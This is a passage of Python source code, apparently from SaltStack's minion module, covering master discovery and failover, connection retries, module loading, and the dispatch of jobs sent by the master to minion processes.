returned. If this function is called outside the minions initialization
phase (for example from the minions main event-loop when a master connection
loss was detected), 'failed' should be set to True. The current
(possibly failed) master will then be removed from the list of masters.
'''
# return early if we are not connecting to a master
if opts['master_type'] == 'disable':
log.warning('Master is set to disable, skipping connection')
self.connected = False
raise tornado.gen.Return((None, None))
# Run masters discovery over SSDP. This may modify the whole configuration,
# depending of the networking and sets of masters.
self._discover_masters()
# check if master_type was altered from its default
if opts['master_type'] != 'str' and opts['__role'] != 'syndic':
# check for a valid keyword
if opts['master_type'] == 'func':
eval_master_func(opts)
# if failover or distributed is set, master has to be of type list
elif opts['master_type'] in ('failover', 'distributed'):
if isinstance(opts['master'], list):
log.info(
'Got list of available master addresses: %s',
opts['master']
)
if opts['master_type'] == 'distributed':
master_len = len(opts['master'])
if master_len > 1:
secondary_masters = opts['master'][1:]
master_idx = crc32(opts['id']) % master_len
try:
preferred_masters = opts['master']
preferred_masters[0] = opts['master'][master_idx]
preferred_masters[1:] = [m for m in opts['master'] if m != preferred_masters[0]]
opts['master'] = preferred_masters
log.info('Distributed to the master at \'{0}\'.'.format(opts['master'][0]))
except (KeyError, AttributeError, TypeError):
log.warning('Failed to distribute to a specific master.')
else:
log.warning('master_type = distributed needs more than 1 master.')
if opts['master_shuffle']:
log.warning(
'Use of \'master_shuffle\' detected. \'master_shuffle\' is deprecated in favor '
'of \'random_master\'. Please update your minion config file.'
)
opts['random_master'] = opts['master_shuffle']
opts['auth_tries'] = 0
if opts['master_failback'] and opts['master_failback_interval'] == 0:
opts['master_failback_interval'] = opts['master_alive_interval']
# if opts['master'] is a str and we have never created opts['master_list']
elif isinstance(opts['master'], six.string_types) and ('master_list' not in opts):
# We have a string, but a list was what was intended. Convert.
# See issue 23611 for details
opts['master'] = [opts['master']]
elif opts['__role'] == 'syndic':
log.info('Syndic setting master_syndic to \'%s\'', opts['master'])
# if failed=True, the minion was previously connected
# we're probably called from the minions main-event-loop
# because a master connection loss was detected. remove
# the possibly failed master from the list of masters.
elif failed:
if failback:
# failback list of masters to original config
opts['master'] = opts['master_list']
else:
log.info(
'Moving possibly failed master %s to the end of '
'the list of masters', opts['master']
)
if opts['master'] in opts['local_masters']:
# create new list of master with the possibly failed
# one moved to the end
failed_master = opts['master']
opts['master'] = [x for x in opts['local_masters'] if opts['master'] != x]
opts['master'].append(failed_master)
else:
opts['master'] = opts['master_list']
else:
msg = ('master_type set to \'failover\' but \'master\' '
'is not of type list but of type '
'{0}'.format(type(opts['master'])))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# If failover is set, minion have to failover on DNS errors instead of retry DNS resolve.
# See issue 21082 for details
if opts['retry_dns'] and opts['master_type'] == 'failover':
msg = ('\'master_type\' set to \'failover\' but \'retry_dns\' is not 0. '
'Setting \'retry_dns\' to 0 to failover to the next master on DNS errors.')
log.critical(msg)
opts['retry_dns'] = 0
else:
msg = ('Invalid keyword \'{0}\' for variable '
'\'master_type\''.format(opts['master_type']))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# FIXME: if SMinion don't define io_loop, it can't switch master see #29088
# Specify kwargs for the channel factory so that SMinion doesn't need to define an io_loop
# (The channel factories will set a default if the kwarg isn't passed)
factory_kwargs = {'timeout': timeout, 'safe': safe}
if getattr(self, 'io_loop', None):
factory_kwargs['io_loop'] = self.io_loop # pylint: disable=no-member
tries = opts.get('master_tries', 1)
attempts = 0
# if we have a list of masters, loop through them and be
# happy with the first one that allows us to connect
if isinstance(opts['master'], list):
conn = False
last_exc = None
opts['master_uri_list'] = []
opts['local_masters'] = copy.copy(opts['master'])
# shuffle the masters and then loop through them
if opts['random_master']:
# master_failback is only used when master_type is set to failover
if opts['master_type'] == 'failover' and opts['master_failback']:
secondary_masters = opts['local_masters'][1:]
shuffle(secondary_masters)
opts['local_masters'][1:] = secondary_masters
else:
shuffle(opts['local_masters'])
# This sits outside of the connection loop below because it needs to set
# up a list of master URIs regardless of which masters are available
# to connect _to_. This is primarily used for masterless mode, when
# we need a list of master URIs to fire calls back to.
for master in opts['local_masters']:
opts['master'] = master
opts.update(prep_ip_port(opts))
opts['master_uri_list'].append(resolve_dns(opts)['master_uri'])
while True:
if attempts != 0:
# Give up a little time between connection attempts
# to allow the IOLoop to run any other scheduled tasks.
yield tornado.gen.sleep(opts['acceptance_wait_time'])
attempts += 1
if tries > 0:
log.debug(
'Connecting to master. Attempt %s of %s',
attempts, tries
)
else:
log.debug(
'Connecting to master. Attempt %s (infinite attempts)',
attempts
)
for master in opts['local_masters']:
opts['master'] = master
opts.update(prep_ip_port(opts))
opts.update(resolve_dns(opts))
# on first run, update self.opts with the whole master list
# to enable a minion to re-use old masters if they get fixed
if 'master_list' not in opts:
opts['master_list'] = copy.copy(opts['local_masters'])
self.opts = opts
try:
pub_channel = salt.transport.client.AsyncPubChannel.factory(opts, **factory_kwargs)
yield pub_channel.connect()
conn = True
break
except SaltClientError as exc:
last_exc = exc
if exc.strerror.startswith('Could not access'):
msg = (
'Failed to initiate connection with Master '
'%s: check ownership/permissions. Error '
'message: %s', opts['master'], exc
)
else:
msg = ('Master %s could not be reached, trying next '
'next master (if any)', opts['master'])
log.info(msg)
continue
if not conn:
if attempts == tries:
# Exhausted all attempts. Return exception.
self.connected = False
self.opts['master'] = copy.copy(self.opts['local_masters'])
log.error(
'No master could be reached or all masters '
'denied the minion\'s connection attempt.'
)
# If the code reaches this point, 'last_exc'
# should already be set.
raise last_exc # pylint: disable=E0702
else:
self.tok = pub_channel.auth.gen_token(b'salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
# single master sign in
else:
if opts['random_master']:
log.warning('random_master is True but there is only one master specified. Ignoring.')
while True:
if attempts != 0:
# Give up a little time between connection attempts
# to allow the IOLoop to run any other scheduled tasks.
yield tornado.gen.sleep(opts['acceptance_wait_time'])
attempts += 1
if tries > 0:
log.debug(
'Connecting to master. Attempt %s of %s',
attempts, tries
)
else:
log.debug(
'Connecting to master. Attempt %s (infinite attempts)',
attempts
)
opts.update(prep_ip_port(opts))
opts.update(resolve_dns(opts))
try:
if self.opts['transport'] == 'detect':
self.opts['detect_mode'] = True
for trans in ('zeromq', 'tcp'):
if trans == 'zeromq' and not zmq:
continue
self.opts['transport'] = trans
pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts, **factory_kwargs)
yield pub_channel.connect()
if not pub_channel.auth.authenticated:
continue
del self.opts['detect_mode']
break
else:
pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts, **factory_kwargs)
yield pub_channel.connect()
self.tok = pub_channel.auth.gen_token(b'salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
except SaltClientError as exc:
if attempts == tries:
# Exhausted all attempts. Return exception.
self.connected = False
raise exc
def _discover_masters(self):
'''
Discover master(s) and decide where to connect, if SSDP is around.
This modifies the configuration on the fly.
:return:
'''
if self.opts['master'] == DEFAULT_MINION_OPTS['master'] and self.opts['discovery'] is not False:
master_discovery_client = salt.utils.ssdp.SSDPDiscoveryClient()
masters = {}
for att in range(self.opts['discovery'].get('attempts', 3)):
try:
att += 1
log.info('Attempting {0} time{1} to discover masters'.format(att, (att > 1 and 's' or '')))
masters.update(master_discovery_client.discover())
if not masters:
time.sleep(self.opts['discovery'].get('pause', 5))
else:
break
except Exception as err:
log.error('SSDP discovery failure: {0}'.format(err))
break
if masters:
policy = self.opts.get('discovery', {}).get('match', 'any')
if policy not in ['any', 'all']:
log.error('SSDP configuration matcher failure: unknown value "{0}". '
'Should be "any" or "all"'.format(policy))
else:
mapping = self.opts['discovery'].get('mapping', {})
for addr, mappings in masters.items():
for proto_data in mappings:
cnt = len([key for key, value in mapping.items()
if proto_data.get('mapping', {}).get(key) == value])
if policy == 'any' and bool(cnt) or cnt == len(mapping):
self.opts['master'] = proto_data['master']
return
def _return_retry_timer(self):
'''
Based on the minion configuration, either return a randomized timer or
just return the value of the return_retry_timer.
'''
msg = 'Minion return retry timer set to {0} seconds'
# future lint: disable=str-format-in-logging
if self.opts.get('return_retry_timer_max'):
try:
random_retry = randint(self.opts['return_retry_timer'], self.opts['return_retry_timer_max'])
log.debug(msg.format(random_retry) + ' (randomized)')
return random_retry
except ValueError:
# Catch wiseguys using negative integers here
log.error(
'Invalid value (return_retry_timer: %s or '
'return_retry_timer_max: %s). Both must be positive '
'integers.',
self.opts['return_retry_timer'],
self.opts['return_retry_timer_max'],
)
log.debug(msg.format(DEFAULT_MINION_OPTS['return_retry_timer']))
return DEFAULT_MINION_OPTS['return_retry_timer']
else:
log.debug(msg.format(self.opts.get('return_retry_timer')))
return self.opts.get('return_retry_timer')
# future lint: enable=str-format-in-logging
class SMinion(MinionBase):
'''
Create an object that has loaded all of the minion module functions,
grains, modules, returners etc. The SMinion allows developers to
generate all of the salt minion functions and present them with these
functions for general use.
'''
def __init__(self, opts):
# Late setup of the opts grains, so we can log from the grains module
import salt.loader
opts['grains'] = salt.loader.grains(opts)
super(SMinion, self).__init__(opts)
# Clean out the proc directory (default /var/cache/salt/minion/proc)
if (self.opts.get('file_client', 'remote') == 'remote'
or self.opts.get('use_master_when_local', False)):
install_zmq()
io_loop = ZMQDefaultLoop.current()
io_loop.run_sync(
lambda: self.eval_master(self.opts, failed=True)
)
self.gen_modules(initial_load=True)
# If configured, cache pillar data on the minion
if self.opts['file_client'] == 'remote' and self.opts.get('minion_pillar_cache', False):
import salt.utils.yaml
pdir = os.path.join(self.opts['cachedir'], 'pillar')
if not os.path.isdir(pdir):
os.makedirs(pdir, 0o700)
ptop = os.path.join(pdir, 'top.sls')
if self.opts['saltenv'] is not None:
penv = self.opts['saltenv']
else:
penv = 'base'
cache_top = {penv: {self.opts['id']: ['cache']}}
with salt.utils.files.fopen(ptop, 'wb') as fp_:
salt.utils.yaml.safe_dump(cache_top, fp_)
os.chmod(ptop, 0o600)
cache_sls = os.path.join(pdir, 'cache.sls')
with salt.utils.files.fopen(cache_sls, 'wb') as fp_:
salt.utils.yaml.safe_dump(self.opts['pillar'], fp_)
os.chmod(cache_sls, 0o600)
def gen_modules(self, initial_load=False):
'''
Tell the minion to reload the execution modules
CLI Example:
.. code-block:: bash
salt '*' sys.reload_modules
'''
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['saltenv'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, utils=self.utils)
self.serializers = salt.loader.serializers(self.opts)
self.returners = salt.loader.returners(self.opts, self.functions)
self.proxy = salt.loader.proxy(self.opts, self.functions, self.returners, None)
# TODO: remove
self.function_errors = {} # Keep the funcs clean
self.states = salt.loader.states(self.opts,
self.functions,
self.utils,
self.serializers)
self.rend = salt.loader.render(self.opts, self.functions)
# self.matcher = Matcher(self.opts, self.functions)
self.matchers = salt.loader.matchers(self.opts)
self.functions['sys.reload_modules'] = self.gen_modules
self.executors = salt.loader.executors(self.opts)
class MasterMinion(object):
'''
Create a fully loaded minion function object for generic use on the
master. What makes this class different is that the pillar is
omitted, otherwise everything else is loaded cleanly.
'''
def __init__(
self,
opts,
returners=True,
states=True,
rend=True,
matcher=True,
whitelist=None,
ignore_config_errors=True):
self.opts = salt.config.minion_config(
opts['conf_file'],
ignore_config_errors=ignore_config_errors,
role='master'
)
self.opts.update(opts)
self.whitelist = whitelist
self.opts['grains'] = salt.loader.grains(opts)
self.opts['pillar'] = {}
self.mk_returners = returners
self.mk_states = states
self.mk_rend = rend
self.mk_matcher = matcher
self.gen_modules(initial_load=True)
def gen_modules(self, initial_load=False):
'''
Tell the minion to reload the execution modules
CLI Example:
.. code-block:: bash
salt '*' sys.reload_modules
'''
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(
self.opts,
utils=self.utils,
whitelist=self.whitelist,
initial_load=initial_load)
self.serializers = salt.loader.serializers(self.opts)
if self.mk_returners:
self.returners = salt.loader.returners(self.opts, self.functions)
if self.mk_states:
self.states = salt.loader.states(self.opts,
self.functions,
self.utils,
self.serializers)
if self.mk_rend:
self.rend = salt.loader.render(self.opts, self.functions)
if self.mk_matcher:
self.matchers = salt.loader.matchers(self.opts)
self.functions['sys.reload_modules'] = self.gen_modules
class MinionManager(MinionBase):
'''
Create a multi minion interface, this creates as many minions as are
defined in the master option and binds each minion object to a respective
master.
'''
def __init__(self, opts):
super(MinionManager, self).__init__(opts)
self.auth_wait = self.opts['acceptance_wait_time']
self.max_auth_wait = self.opts['acceptance_wait_time_max']
self.minions = []
self.jid_queue = []
install_zmq()
self.io_loop = ZMQDefaultLoop.current()
self.process_manager = ProcessManager(name='MultiMinionProcessManager')
self.io_loop.spawn_callback(self.process_manager.run, **{'asynchronous': True}) # Tornado backward compat
def __del__(self):
self.destroy()
def _bind(self):
# start up the event publisher, so we can see events during startup
self.event_publisher = salt.utils.event.AsyncEventPublisher(
self.opts,
io_loop=self.io_loop,
)
self.event = salt.utils.event.get_event('minion', opts=self.opts, io_loop=self.io_loop)
self.event.subscribe('')
self.event.set_event_handler(self.handle_event)
@tornado.gen.coroutine
def handle_event(self, package):
yield [minion.handle_event(package) for minion in self.minions]
def _create_minion_object(self, opts, timeout, safe,
io_loop=None, loaded_base_name=None,
jid_queue=None):
'''
Helper function to return the correct type of object
'''
return Minion(opts,
timeout,
safe,
io_loop=io_loop,
loaded_base_name=loaded_base_name,
jid_queue=jid_queue)
def _spawn_minions(self):
'''
Spawn all the coroutines which will sign in to masters
'''
masters = self.opts['master']
if (self.opts['master_type'] in ('failover', 'distributed')) or not isinstance(self.opts['master'], list):
masters = [masters]
for master in masters:
s_opts = copy.deepcopy(self.opts)
s_opts['master'] = master
s_opts['multimaster'] = True
minion = self._create_minion_object(s_opts,
s_opts['auth_timeout'],
False,
io_loop=self.io_loop,
loaded_base_name='salt.loader.{0}'.format(s_opts['master']),
jid_queue=self.jid_queue,
)
self.minions.append(minion)
self.io_loop.spawn_callback(self._connect_minion, minion)
@tornado.gen.coroutine
def _connect_minion(self, minion):
'''
Create a minion, and asynchronously connect it to a master
'''
last = 0 # never have we signed in
auth_wait = minion.opts['acceptance_wait_time']
failed = False
while True:
try:
if minion.opts.get('beacons_before_connect', False):
minion.setup_beacons(before_connect=True)
if minion.opts.get('scheduler_before_connect', False):
minion.setup_scheduler(before_connect=True)
yield minion.connect_master(failed=failed)
minion.tune_in(start=False)
break
except SaltClientError as exc:
failed = True
log.error(
'Error while bringing up minion for multi-master. Is '
'master at %s responding?', minion.opts['master']
)
last = time.time()
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
yield tornado.gen.sleep(auth_wait) # TODO: log?
except Exception as e:
failed = True
log.critical(
'Unexpected error while connecting to %s',
minion.opts['master'], exc_info=True
)
# Multi Master Tune In
def tune_in(self):
'''
Bind to the masters
This loop will attempt to create connections to masters it hasn't connected
to yet, but once the initial connection is made it is up to ZMQ to do the
reconnect (don't know of an API to get the state here in salt)
'''
self._bind()
# Fire off all the minion coroutines
self._spawn_minions()
# serve forever!
self.io_loop.start()
@property
def restart(self):
for minion in self.minions:
if minion.restart:
return True
return False
def stop(self, signum):
for minion in self.minions:
minion.process_manager.stop_restarting()
minion.process_manager.send_signal_to_processes(signum)
# kill any remaining processes
minion.process_manager.kill_children()
minion.destroy()
def destroy(self):
for minion in self.minions:
minion.destroy()
class Minion(MinionBase):
'''
This class instantiates a minion, runs connections for a minion,
and loads all of the functions into the minion
'''
def __init__(self, opts, timeout=60, safe=True, loaded_base_name=None, io_loop=None, jid_queue=None): # pylint: disable=W0231
'''
Pass in the options dict
'''
# this means that the parent class doesn't know *which* master we connect to
super(Minion, self).__init__(opts)
self.timeout = timeout
self.safe = safe
self._running = None
self.win_proc = []
self.loaded_base_name = loaded_base_name
self.connected = False
self.restart = False
# Flag meaning minion has finished initialization including first connect to the master.
# True means the Minion is fully functional and ready to handle events.
self.ready = False
self.jid_queue = [] if jid_queue is None else jid_queue
self.periodic_callbacks = {}
if io_loop is None:
install_zmq()
self.io_loop = ZMQDefaultLoop.current()
else:
self.io_loop = io_loop
# Warn if ZMQ < 3.2
if zmq:
if ZMQ_VERSION_INFO < (3, 2):
log.warning(
'You have a version of ZMQ less than ZMQ 3.2! There are '
'known connection keep-alive issues with ZMQ < 3.2 which '
'may result in loss of contact with minions. Please '
'upgrade your ZMQ!'
)
# Late setup of the opts grains, so we can log from the grains
# module. If this is a proxy, however, we need to init the proxymodule
# before we can get the grains. We do this for proxies in the
# post_master_init
if not salt.utils.platform.is_proxy():
self.opts['grains'] = salt.loader.grains(opts)
else:
if self.opts.get('beacons_before_connect', False):
log.warning(
'\'beacons_before_connect\' is not supported '
'for proxy minions. Setting to False'
)
self.opts['beacons_before_connect'] = False
if self.opts.get('scheduler_before_connect', False):
log.warning(
'\'scheduler_before_connect\' is not supported '
'for proxy minions. Setting to False'
)
self.opts['scheduler_before_connect'] = False
log.info('Creating minion process manager')
if self.opts['random_startup_delay']:
sleep_time = random.randint(0, self.opts['random_startup_delay'])
log.info(
'Minion sleeping for %s seconds due to configured '
'startup_delay between 0 and %s seconds',
sleep_time, self.opts['random_startup_delay']
)
time.sleep(sleep_time)
self.process_manager = ProcessManager(name='MinionProcessManager')
self.io_loop.spawn_callback(self.process_manager.run, **{'asynchronous': True})
# We don't have the proxy setup yet, so we can't start engines
# Engines need to be able to access __proxy__
if not salt.utils.platform.is_proxy():
self.io_loop.spawn_callback(salt.engines.start_engines, self.opts,
self.process_manager)
# Install the SIGINT/SIGTERM handlers if not done so far
if signal.getsignal(signal.SIGINT) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGINT, self._handle_signals)
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGTERM, self._handle_signals)
def _handle_signals(self, signum, sigframe): # pylint: disable=unused-argument
self._running = False
# escalate the signals to the process manager
self.process_manager.stop_restarting()
self.process_manager.send_signal_to_processes(signum)
# kill any remaining processes
self.process_manager.kill_children()
time.sleep(1)
sys.exit(0)
def sync_connect_master(self, timeout=None, failed=False):
'''
Block until we are connected to a master
'''
self._sync_connect_master_success = False
log.debug("sync_connect_master")
def on_connect_master_future_done(future):
self._sync_connect_master_success = True
self.io_loop.stop()
self._connect_master_future = self.connect_master(failed=failed)
# finish connecting to master
self._connect_master_future.add_done_callback(on_connect_master_future_done)
if timeout:
self.io_loop.call_later(timeout, self.io_loop.stop)
try:
self.io_loop.start()
except KeyboardInterrupt:
self.destroy()
# I made the following 3 line oddity to preserve traceback.
# Please read PR #23978 before changing, hopefully avoiding regressions.
# Good luck, we're all counting on you. Thanks.
if self._connect_master_future.done():
future_exception = self._connect_master_future.exception()
if future_exception:
# This needs to be re-raised to preserve restart_on_error behavior.
raise six.reraise(*future_exception)
if timeout and self._sync_connect_master_success is False:
raise SaltDaemonNotRunning('Failed to connect to the salt-master')
@tornado.gen.coroutine
def connect_master(self, failed=False):
'''
Return a future which will complete when you are connected to a master
'''
master, self.pub_channel = yield self.eval_master(self.opts, self.timeout, self.safe, failed)
yield self._post_master_init(master)
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
If this function is changed, please check ProxyMinion._post_master_init
to see if those changes need to be propagated.
Minions and ProxyMinions need significantly different post master setups,
which is why the differences are not factored out into separate helper
functions.
'''
if self.connected:
self.opts['master'] = master
# Initialize pillar before loader to make pillar accessible in modules
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['saltenv'],
pillarenv=self.opts.get('pillarenv')
).compile_pillar()
if not self.ready:
self._setup_core()
elif self.connected and self.opts['pillar']:
# The pillar has changed due to the connection to the master.
# Reload the functions so that they can use the new pillar data.
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
if hasattr(self, 'schedule'):
self.schedule.functions = self.functions
self.schedule.returners = self.returners
if not hasattr(self, 'schedule'):
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners,
cleanup=[master_event(type='alive')])
# add default scheduling jobs to the minions scheduler
if self.opts['mine_enabled'] and 'mine.update' in self.functions:
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': self.opts['mine_interval'],
'jid_include': True,
'maxrunning': 2,
'run_on_start': True,
'return_job': self.opts.get('mine_return_job', False)
}
}, persist=True)
log.info('Added mine.update to scheduler')
else:
self.schedule.delete_job('__mine_interval', persist=True)
# add master_alive job if enabled
if (self.opts['transport'] != 'tcp' and
self.opts['master_alive_interval'] > 0 and
self.connected):
self.schedule.add_job({
master_event(type='alive', master=self.opts['master']):
{
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
}, persist=True)
if self.opts['master_failback'] and \
'master_list' in self.opts and \
self.opts['master'] != self.opts['master_list'][0]:
self.schedule.add_job({
master_event(type='failback'):
{
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master_list'][0]}
}
}, persist=True)
else:
self.schedule.delete_job(master_event(type='failback'), persist=True)
else:
self.schedule.delete_job(master_event(type='alive', master=self.opts['master']), persist=True)
self.schedule.delete_job(master_event(type='failback'), persist=True)
def _prep_mod_opts(self):
'''
Returns a copy of the opts with key bits stripped out
'''
mod_opts = {}
for key, val in six.iteritems(self.opts):
if key == 'logger':
continue
mod_opts[key] = val
return mod_opts
def _load_modules(self, force_refresh=False, notify=False, grains=None):
'''
Return the functions and the returners loaded up from the loader
module
'''
# if this is a *nix system AND modules_max_memory is set, lets enforce
# a memory limit on module imports
# this feature ONLY works on *nix like OSs (resource module doesn't work on windows)
modules_max_memory = False
if self.opts.get('modules_max_memory', -1) > 0 and HAS_PSUTIL and HAS_RESOURCE:
log.debug(
'modules_max_memory set, enforcing a maximum of %s',
self.opts['modules_max_memory']
)
modules_max_memory = True
old_mem_limit = resource.getrlimit(resource.RLIMIT_AS)
rss, vms = psutil.Process(os.getpid()).memory_info()[:2]
mem_limit = rss + vms + self.opts['modules_max_memory']
resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit))
elif self.opts.get('modules_max_memory', -1) > 0:
if not HAS_PSUTIL:
log.error('Unable to enforce modules_max_memory because psutil is missing')
if not HAS_RESOURCE:
log.error('Unable to enforce modules_max_memory because resource is missing')
# This might be a proxy minion
if hasattr(self, 'proxy'):
proxy = self.proxy
else:
proxy = None
if grains is None:
self.opts['grains'] = salt.loader.grains(self.opts, force_refresh, proxy=proxy)
self.utils = salt.loader.utils(self.opts, proxy=proxy)
if self.opts.get('multimaster', False):
s_opts = copy.deepcopy(self.opts)
functions = salt.loader.minion_mods(s_opts, utils=self.utils, proxy=proxy,
loaded_base_name=self.loaded_base_name, notify=notify)
else:
functions = salt.loader.minion_mods(self.opts, utils=self.utils, notify=notify, proxy=proxy)
returners = salt.loader.returners(self.opts, functions, proxy=proxy)
errors = {}
if '_errors' in functions:
errors = functions['_errors']
functions.pop('_errors')
# we're done, reset the limits!
if modules_max_memory is True:
resource.setrlimit(resource.RLIMIT_AS, old_mem_limit)
executors = salt.loader.executors(self.opts, functions, proxy=proxy)
return functions, returners, errors, executors
def _send_req_sync(self, load, timeout):
if self.opts['minion_sign_messages']:
log.trace('Signing event to be published onto the bus.')
minion_privkey_path = os.path.join(self.opts['pki_dir'], 'minion.pem')
sig = salt.crypt.sign_message(minion_privkey_path, salt.serializers.msgpack.serialize(load))
load['sig'] = sig
channel = salt.transport.Channel.factory(self.opts)
return channel.send(load, timeout=timeout)
@tornado.gen.coroutine
def _send_req_async(self, load, timeout):
if self.opts['minion_sign_messages']:
log.trace('Signing event to be published onto the bus.')
minion_privkey_path = os.path.join(self.opts['pki_dir'], 'minion.pem')
sig = salt.crypt.sign_message(minion_privkey_path, salt.serializers.msgpack.serialize(load))
load['sig'] = sig
channel = salt.transport.client.AsyncReqChannel.factory(self.opts)
ret = yield channel.send(load, timeout=timeout)
raise tornado.gen.Return(ret)
def _fire_master(self, data=None, tag=None, events=None, pretag=None, timeout=60, sync=True, timeout_handler=None):
'''
Fire an event on the master, or drop message if unable to send.
'''
load = {'id': self.opts['id'],
'cmd': '_minion_event',
'pretag': pretag,
'tok': self.tok}
if events:
load['events'] = events
elif data and tag:
load['data'] = data
load['tag'] = tag
elif not data and tag:
load['data'] = {}
load['tag'] = tag
else:
return
if sync:
try:
self._send_req_sync(load, timeout)
except salt.exceptions.SaltReqTimeoutError:
log.info('fire_master failed: master could not be contacted. Request timed out.')
# very likely one of the masters is dead, status.master will flush it
self.functions['status.master'](self.opts['master'])
return False
except Exception:
log.info('fire_master failed: %s', traceback.format_exc())
return False
else:
if timeout_handler is None:
def handle_timeout(*_):
log.info('fire_master failed: master could not be contacted. Request timed out.')
# very likely one of the masters is dead, status.master will flush it
self.functions['status.master'](self.opts['master'])
return True
timeout_handler = handle_timeout
with tornado.stack_context.ExceptionStackContext(timeout_handler):
self._send_req_async(load, timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg
return True
@tornado.gen.coroutine
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
# Ensure payload is unicode. Disregard failure to decode binary blobs.
if six.PY2:
data = salt.utils.data.decode(data, keep=True)
if 'user' in data:
log.info(
'User %s Executing command %s with jid %s',
data['user'], data['fun'], data['jid']
)
else:
log.info(
'Executing command %s with jid %s',
data['fun'], data['jid']
)
log.debug('Command details %s', data)
# Don't duplicate jobs
log.trace('Started JIDs: %s', self.jid_queue)
if self.jid_queue is not None:
if data['jid'] in self.jid_queue:
return
else:
self.jid_queue.append(data['jid'])
if len(self.jid_queue) > self.opts['minion_jid_queue_hwm']:
self.jid_queue.pop(0)
if isinstance(data['fun'], six.string_types):
if data['fun'] == 'sys.reload_modules':
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.schedule.functions = self.functions
self.schedule.returners = self.returners
process_count_max = self.opts.get('process_count_max')
if process_count_max > 0:
process_count = len(salt.utils.minion.running(self.opts))
while process_count >= process_count_max:
log.warning("Maximum number of processes reached while executing jid {0}, waiting...".format(data['jid']))
yield tornado.gen.sleep(10)
process_count = len(salt.utils.minion.running(self.opts))
# We stash an instance references to allow for the socket
# communication in Windows. You can't pickle functions, and thus
# python needs to be able to reconstruct the reference on the other
# side.
instance = self
multiprocessing_enabled = self.opts.get('multiprocessing', True)
if multiprocessing_enabled:
if sys.platform.startswith('win'):
# let python reconstruct the minion on the other side if we're
# running on windows
instance = None
with default_signals(signal.SIGINT, signal.SIGTERM):
process = SignalHandlingMultiprocessingProcess(
target=self._target, args=(instance, self.opts, data, self.connected)
)
else:
process = threading.Thread(
target=self._target,
args=(instance, self.opts, data, self.connected),
name=data['jid']
)
if multiprocessing_enabled:
with default_signals(signal.SIGINT, signal.SIGTERM):
# Reset current signals before starting the process in
# order not to inherit the current signal handlers
process.start()
else:
process.start()
# TODO: remove the windows specific check?
if multiprocessing_enabled and not salt.utils.platform.is_windows():
# we only want to join() immediately if we are daemonizing a process
process.join()
else:
self.win_proc.append(process)
def ctx(self):
'''
Return a single context manager for the minion's data
'''
if six.PY2:
return contextlib.nested(
self.functions.context_dict.clone(),
self.returners.context_dict.clone(),
self.executors.context_dict.clone(),
)
else:
exitstack = contextlib.ExitStack()
exitstack.enter_context(self.functions.context_dict.clone())
exitstack.enter_context(self.returners.context_dict.clone())
exitstack.enter_context(self.executors.context_dict.clone())
return exitstack
@classmethod
def _target(cls, minion_instance, opts, data, connected):
if not minion_instance:
minion_instance = cls(opts)
minion_instance.connected = connected
if not hasattr(minion_instance, 'functions'):
functions, returners, function_errors, executors = (
minion_instance._load_modules(grains=opts['grains'])
)
minion_instance.functions = functions
minion_instance.returners = returners
minion_instance.function_errors = function_errors
minion_instance.executors = executors
if not hasattr(minion_instance, 'serial'):
minion_instance.serial = salt.payload.Serial(opts)
if not hasattr(minion_instance, 'proc_dir'):
uid = salt.utils.user.get_uid(user=opts.get('user', None))
minion_instance.proc_dir = (
get_proc_dir(opts['cachedir'], uid=uid)
)
def run_func(minion_instance, opts, data):
if isinstance(data['fun'], tuple) or isinstance(data['fun'], list):
return Minion._thread_multi_return(minion_instance, opts, data)
else:
return Minion._thread_return(minion_instance, opts, data)
with tornado.stack_context.StackContext(functools.partial(RequestContext,
{'data': data, 'opts': opts})):
with tornado.stack_context.StackContext(minion_instance.ctx):
run_func(minion_instance, opts, data)
@classmethod
def _thread_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
if opts['multiprocessing'] and not salt.utils.platform.is_windows():
# Shutdown the multiprocessing before daemonizing
salt.log.setup.shutdown_multiprocessing_logging()
salt.utils.process.daemonize_if(opts)
# Reconfigure multiprocessing logging after daemonizing
salt.log.setup.setup_multiprocessing_logging()
salt.utils.process.appendproctitle('{0}._thread_return {1}'.format(cls.__name__, data['jid']))
sdata = {'pid': os.getpid()}
sdata.update(data)
log.info('Starting a new job with PID %s', sdata['pid'])
with salt.utils.files.fopen(fn_, 'w+b') as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
ret = {'success': False}
function_name = data['fun']
executors = data.get('module_executors') or \
getattr(minion_instance, 'module_executors', []) or \
opts.get('module_executors', ['direct_call'])
allow_missing_funcs = any([
minion_instance.executors['{0}.allow_missing_func'.format(executor)](function_name)
for executor in executors
